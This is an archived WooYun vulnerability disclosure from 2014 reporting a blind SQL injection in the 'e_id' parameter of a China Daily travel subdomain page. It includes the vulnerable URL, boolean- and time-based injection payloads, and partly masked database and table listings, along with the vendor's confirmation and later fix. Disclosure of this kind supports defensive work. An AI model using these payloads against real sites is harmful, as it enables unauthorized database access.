当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-073187

漏洞标题:中国日报分站SQL注射漏洞

相关厂商:中国日报网

漏洞作者: 紫霞仙子

提交时间:2014-09-18 10:56

修复时间:2014-09-24 09:29

公开时间:2014-09-24 09:29

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-18: 细节已通知厂商并且等待厂商处理中
2014-09-18: 厂商已经确认,细节仅向厂商公开
2014-09-24: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

因为数据库不同,所以分开提交。

详细说明:

http://travel.chinadaily.com.cn/events/eventinfo?e_id=

漏洞证明:

Place: GET
Parameter: e_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: e_id=30' AND 4944=4944 AND 'XKuE'='XKuE
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: e_id=30' AND SLEEP(5) AND 'oLbG'='oLbG
---
available databases [3]:
[*] ichuguo_sear**
[*] information_**
[*] t**
Database: ichuguo_searchen
[51 tables]
+--------------------------+
| Expo_A** |
| Expo_C** |
| Expo_City_A** |
| Expo_Conta**s |
| Expo_Exhibit_** |
| Expo_Exhibit_** |
| Expo_Exhibit_Or** |
| Expo_Exhibit_** |
| Expo_Floor** |
| Expo_Industry_Cate** |
| Expo_N** |
| Expo_Sc** |
| Expo_T** |
| Exposi** n |
| Exposition_** |
| _system_set** |
| _wenda_city_dis** |
| _wenda_v** |
| _wenda_video_** |
| acl_admin_g** |
| acl_i** |
| acl_i** _bak |
| admin_cl**r |
| admingr** |
| admin** |
| adv_c** |
| adv_co** |
| adv_hot_** |
| adv_n** |
| area_a** |
| area_cat** |
| art** |
| article_cate** |
| article_category_re** |
| article_recom** |
| ev**** |
| newsle** |
| operate_l** |
| recom** |
| recom**_posi** |
| site_i** |
| spec** |
| spec**_category |
| spec** _category_related |
| spe** _operate_logs |
| spe**l_rec** |
| spe**l_te**y |
| subscribe_** |
| v** |
| venue_**** |
+--------------------------+

修复方案:

版权声明:转载请注明来源 紫霞仙子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-09-18 16:16

厂商回复:

收到,但是程序组一直没有找到处理办法!

最新状态:

2014-09-24:已经修复,谢谢@紫霞仙子支持